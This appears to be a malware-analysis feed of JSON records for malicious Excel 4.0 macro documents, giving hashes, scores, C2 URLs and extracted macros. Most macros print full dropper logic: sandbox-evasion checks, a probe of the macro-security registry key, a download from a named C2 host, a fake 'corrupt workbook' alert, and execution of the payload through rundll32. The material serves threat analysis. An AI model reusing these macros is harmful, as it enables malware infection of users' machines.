CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pMpTu7CTxt\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a3f4bef77abc93874f79e197e9c99c68b4bd381a65b5a027843c9f789d4dab2"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"0a3f4bef77abc93874f79e197e9c99c68b4bd381a65b5a027843c9f789d4dab2","filesize":214016,"md5":"c119ddc6fe7f2f931decb6bddbfcf4e9","sha1":"0bc1f5fe545b3d982cdb7c27f82e5e05c1fbb1c9","sha256":"0a3f4bef77abc93874f79e197e9c99c68b4bd381a65b5a027843c9f789d4dab2","sha512":"03bde2005714cc5dc93c2a90b2279c4ab15881cfe1dde38e175998605400c8546160ce6c0e0929fe14919ef1cb52a73e51abd94c0f9b0730d7ede8b9e774d710","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a3f4bef77abc93874f79e197e9c99c68b4bd381a65b5a027843c9f789d4dab2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OOFXOSGfZd\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a629d4911f777a819c17c402e6ba34d734a215fe7b567bf530724ec6e97ff01"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"0a629d4911f777a819c17c402e6ba34d734a215fe7b567bf530724ec6e97ff01","filesize":104448,"md5":"1019d8524b420497b211edb652010ad5","sha1":"b872ba2664f01b5a83afb7ef18e208f9b3a4012f","sha256":"0a629d4911f777a819c17c402e6ba34d734a215fe7b567bf530724ec6e97ff01","sha512":"29791d2b09dc5525ab508c83a5ffc13eeb1c5c74e3189ea961ede96e3e5a55ed095cc26191ad8f1ba36e8f603ea6cfd378eb97f4e2fbdf05d0703400e052406c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a629d4911f777a819c17c402e6ba34d734a215fe7b567bf530724ec6e97ff01.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"1l4pfYNK7J\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a63e7d7add74362776da2939487058456423a514ace6ce4d7374ab8ded83a17"},"analysis":{"reported":"2020-04-09T16:14:48Z","score":10},"files":[{"filename":"0a63e7d7add74362776da2939487058456423a514ace6ce4d7374ab8ded83a17","filesize":209408,"md5":"d1837c35b087e91a22def2071930d192","sha1":"50e0d1e78a55662e5e4da6e1c77534b052412701","sha256":"0a63e7d7add74362776da2939487058456423a514ace6ce4d7374ab8ded83a17","sha512":"2a5f94f955b9a22afa5d938e7c3c57f4af097b3cf3c3a5988123ffe5e02bdbebb54200cdaba04647f4350ac99a8330868062377c1c78f2d35a78ca8ea76ce739","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a63e7d7add74362776da2939487058456423a514ace6ce4d7374ab8ded83a17.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RezHMxzGjs\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a70007f14dad3439a8777ce31914545e0b0f072bd66651309dea6e4f3061a25"},"analysis":{"reported":"2020-04-09T16:14:49Z","score":10},"files":[{"filename":"0a70007f14dad3439a8777ce31914545e0b0f072bd66651309dea6e4f3061a25","filesize":167424,"md5":"1f17a0bd6d41a081ee7b7455d6d84ce3","sha1":"5975a76a0dc059623359a51b8080167d5e7ec377","sha256":"0a70007f14dad3439a8777ce31914545e0b0f072bd66651309dea6e4f3061a25","sha512":"22394ac1f48e9260010c590fe6378c5944d6ef961530216f1f5a9b4979f83672957743f5701aa1ddb3aa5ae6c847714f111bdf34ec87580eb2ddcc58d9e0d37e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a70007f14dad3439a8777ce31914545e0b0f072bd66651309dea6e4f3061a25.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"y2lMsDILFt\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a76efd34bb13b2b184be31ef907221d32ed4a8ebd9198061551fe631427c841"},"analysis":{"reported":"2020-04-09T16:14:49Z","score":10},"files":[{"filename":"0a76efd34bb13b2b184be31ef907221d32ed4a8ebd9198061551fe631427c841","filesize":225280,"md5":"73c2c11142aa4543266bdc08a94eda8a","sha1":"5a7c536829bcf02816b078814a94c1c014972578","sha256":"0a76efd34bb13b2b184be31ef907221d32ed4a8ebd9198061551fe631427c841","sha512":"982c385e4b2cafaf64426672a9b99adca313856c09e482eb705f40e57792717858ac9cdaca99d8b3abf1819c1feb16f4b947a1392421ee48e4f8d54afb5bc3c8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a76efd34bb13b2b184be31ef907221d32ed4a8ebd9198061551fe631427c841.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lc8Tr3ZWOB\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0a95a940bce4eebb4fc617066f824e42afe26dc0b22121da5b96ee3ade51eb0a"},"analysis":{"reported":"2020-04-09T16:14:49Z","score":10},"files":[{"filename":"0a95a940bce4eebb4fc617066f824e42afe26dc0b22121da5b96ee3ade51eb0a","filesize":209408,"md5":"83e2623a8f7a025cb065a215f016561d","sha1":"9d14648b70618a271cf7aece75f0612ccedb7d1a","sha256":"0a95a940bce4eebb4fc617066f824e42afe26dc0b22121da5b96ee3ade51eb0a","sha512":"f2a57cb3b6c6cc0afe5879171ec98ecc127bcb1a34f3ddb5e58c4dd2ad370ab88f061720618ccae6c3e20a9338b7af941834eec657dd8e709b0f6e824b83ef06","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0a95a940bce4eebb4fc617066f824e42afe26dc0b22121da5b96ee3ade51eb0a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dlzJSpAsNt\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0aa4bc45f8dbc37aaed0d86ac3ac9df2c5554a9a328151f56df23dfcc3f68ae5"},"analysis":{"reported":"2020-04-09T16:14:49Z","score":10},"files":[{"filename":"0aa4bc45f8dbc37aaed0d86ac3ac9df2c5554a9a328151f56df23dfcc3f68ae5","filesize":141824,"md5":"ccb2549a0a092ed276b12498b79f8cee","sha1":"0aa5443ef48c851d23dea0546e02fb8048ce180a","sha256":"0aa4bc45f8dbc37aaed0d86ac3ac9df2c5554a9a328151f56df23dfcc3f68ae5","sha512":"d00bad934b7378f41e30640d22c7f304513543193ba293e275c1c5cb7903a37d494e844c5efa05726de40af334d08ca23725d532c4bf324e5e3dd2260598f918","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0aa4bc45f8dbc37aaed0d86ac3ac9df2c5554a9a328151f56df23dfcc3f68ae5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"ebyb2Xi1Kc\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0aba05c9415a2f7fedab7c717c723c1075ed2604e2d158921ff74968b2f8c29d"},"analysis":{"reported":"2020-04-09T16:14:49Z","score":10},"files":[{"filename":"0aba05c9415a2f7fedab7c717c723c1075ed2604e2d158921ff74968b2f8c29d","filesize":144384,"md5":"de9f9e4c1871bbd9c97cf0ef0d3b4976","sha1":"7c27b18257a90b06192b936e4555be0ae32ea8d8","sha256":"0aba05c9415a2f7fedab7c717c723c1075ed2604e2d158921ff74968b2f8c29d","sha512":"c6af2ff49c06631dc9c2ac61999e4a44e9f7bbdf354b5840be27961ea6198ee32312840496e858897dea91d3bf0b19f35d80e3900718b30f9f8799ad6d008434","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0aba05c9415a2f7fedab7c717c723c1075ed2604e2d158921ff74968b2f8c29d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"lNDqOoLu0S\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ad6b761fca1f02cfa691a3d1feb29da3807758efcfdabe6c2613eb1e36bfcae"},"analysis":{"reported":"2020-04-09T16:14:49Z","score":10},"files":[{"filename":"0ad6b761fca1f02cfa691a3d1feb29da3807758efcfdabe6c2613eb1e36bfcae","filesize":167936,"md5":"c0fd40bff4ef68615c1c5c27d64f5ec7","sha1":"4cf61e85f025f1e9313b65a9d331d0ae004b2f72","sha256":"0ad6b761fca1f02cfa691a3d1feb29da3807758efcfdabe6c2613eb1e36bfcae","sha512":"325169a72ecce3c32d59fcd657375262597db8f7bf6d84240e4fb04b13229b73eec1e4eb33c4de1adc48a3d1b5ea0fc5475eb975c1946fd8d96f639e724de079","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ad6b761fca1f02cfa691a3d1feb29da3807758efcfdabe6c2613eb1e36bfcae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LQ0WAXycMX\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0afb24fc4211d2d0c82f791f9fe31d8a4e93686e2ed8a5f78e55a635ff7a6921"},"analysis":{"reported":"2020-04-09T16:14:49Z","score":10},"files":[{"filename":"0afb24fc4211d2d0c82f791f9fe31d8a4e93686e2ed8a5f78e55a635ff7a6921","filesize":214016,"md5":"9260692efc274d4058dd279e2113de94","sha1":"96c03a996765e65db193bb7261f0ff27750b826a","sha256":"0afb24fc4211d2d0c82f791f9fe31d8a4e93686e2ed8a5f78e55a635ff7a6921","sha512":"9082669d410e139243cd1f017a311459efbe199f8486e1b51e31f13fd3bbffca550da49f1fb034e4c9240ecf715f492807466007b987eec7818c1aaa385cae26","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0afb24fc4211d2d0c82f791f9fe31d8a4e93686e2ed8a5f78e55a635ff7a6921.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"v6tiwddSXU\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b03cd027edec1487af0fc80ace801a11b96f6c99016520322d615c950e413aa"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b03cd027edec1487af0fc80ace801a11b96f6c99016520322d615c950e413aa","filesize":209920,"md5":"230816e01b2b835ebf1d952c1f7e5864","sha1":"c253943f3f377ff1a4a49dab2cab0e3cc1f42d4e","sha256":"0b03cd027edec1487af0fc80ace801a11b96f6c99016520322d615c950e413aa","sha512":"2013117bdd6f51a6042e99265d995a2384a44329fae244faa1add7edc0603dbef1bb256d47678e94d7812799146959d1c4d9a9499929352d66f96e1cca07c098","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b03cd027edec1487af0fc80ace801a11b96f6c99016520322d615c950e413aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jpxkxweoTX\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b0bb206c763b9ca806dfe52a227848464a2d43a3a940d768c8a0072d47027d7"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b0bb206c763b9ca806dfe52a227848464a2d43a3a940d768c8a0072d47027d7","filesize":168448,"md5":"25c2cd7221be0789604d6a3b37d21bd5","sha1":"b5ced06d0a37fafb0c8a22b0d15e6bc029e8e36c","sha256":"0b0bb206c763b9ca806dfe52a227848464a2d43a3a940d768c8a0072d47027d7","sha512":"3221c127fc0fc8e46b596ee6a9bc4674c7d001d89e19b6810c887c230847944bd98df16ad5f67ddb59b0f969178a3baef1c64dc17fe662b1874001819050b20c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b0bb206c763b9ca806dfe52a227848464a2d43a3a940d768c8a0072d47027d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SeKUeXyUDo\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b1540fc862bc81b0865a494a401018364fd119c62dfb5e634dd27bc70fbb374"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b1540fc862bc81b0865a494a401018364fd119c62dfb5e634dd27bc70fbb374","filesize":160768,"md5":"5df5019416b762bc5efec3bb4d871056","sha1":"f81369209d6b4576a3e88049ae8edcea4d870fe8","sha256":"0b1540fc862bc81b0865a494a401018364fd119c62dfb5e634dd27bc70fbb374","sha512":"813454cff1051575424889b5ea73cc411fee0d082e8ca4317a6c1aa3bf1595167a20b2ed0c03616a69b01ce7119576026e9fedffa6239a97da513192da97229f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b1540fc862bc81b0865a494a401018364fd119c62dfb5e634dd27bc70fbb374.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vEUIYGIKaE\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0b28f06bf49abc846615be868b642784f372932b8b0a72a6dc14aef7f36ed854"},"analysis":{"reported":"2020-04-09T16:14:50Z","score":10},"files":[{"filename":"0b28f06bf49abc846615be868b642784f372932b8b0a72a6dc14aef7f36ed854","filesize":168960,"md5":"0c099040674348fd97a2222672049509","sha1":"14b9dfad1ad64ad02fb897c957f821cbdf0093e3","sha256":"0b28f06bf49abc846615be868b642784f372932b8b0a72a6dc14aef7f36ed854","sha512":"7443e6ae586c40782829d8ab177f1273f3ebbab3f6b084690291c6bb13dfa1741769070a939b5a6bb173e14fd1d765540e2680f60f51fe6c65ef8ab64404a8b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0b28f06bf49abc846615be868b642784f372932b8b0a72a6dc14aef7f36ed854.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"D7Tt30kwT3\",TRUE)\nGOTO(R$0C$19)"}}}]}
